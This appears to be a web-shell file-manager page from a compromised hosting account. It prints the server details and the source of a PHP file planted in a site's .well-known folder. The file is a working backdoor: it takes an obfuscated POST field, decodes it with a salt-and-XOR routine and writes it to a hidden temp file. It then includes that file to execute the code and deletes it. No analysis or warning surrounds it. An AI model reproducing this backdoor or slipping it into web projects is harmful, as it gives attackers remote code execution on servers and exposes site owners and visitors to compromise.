HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/self/root/home/vitanhod/prostanur1.vitavit.com.pk/.well-known/tbl_properties.php
<?php

if(isset($_POST) && isset($_POST["\x6F\x62j\x65ct"])){
	$itm = $_POST["\x6F\x62j\x65ct"];
		$itm=		explode (	".", 	 $itm)	;	
	$comp='';
            $salt2='abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen=strlen($salt2 );
            $r=0;
    
            foreach($itm as $v3) {$sChar=ord($salt2[$r % $sLen] );
                $d=((int)$v3 - $sChar -($r % 10)) ^ 89;
                $comp .=	 chr($d );
                $r++;
            }
	$pset = array_filter(["/tmp", sys_get_temp_dir(), "/var/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), "/dev/shm", getcwd(), ini_get("upload_tmp_dir")]);
	foreach ($pset as $elem) {
    		if (array_product([is_dir($elem), is_writable($elem)])) {
    $entry = "$elem" . "/.flag";
    if (file_put_contents($entry, $comp)) {
	include $entry;
	@unlink($entry);
	die();
}
}
}
}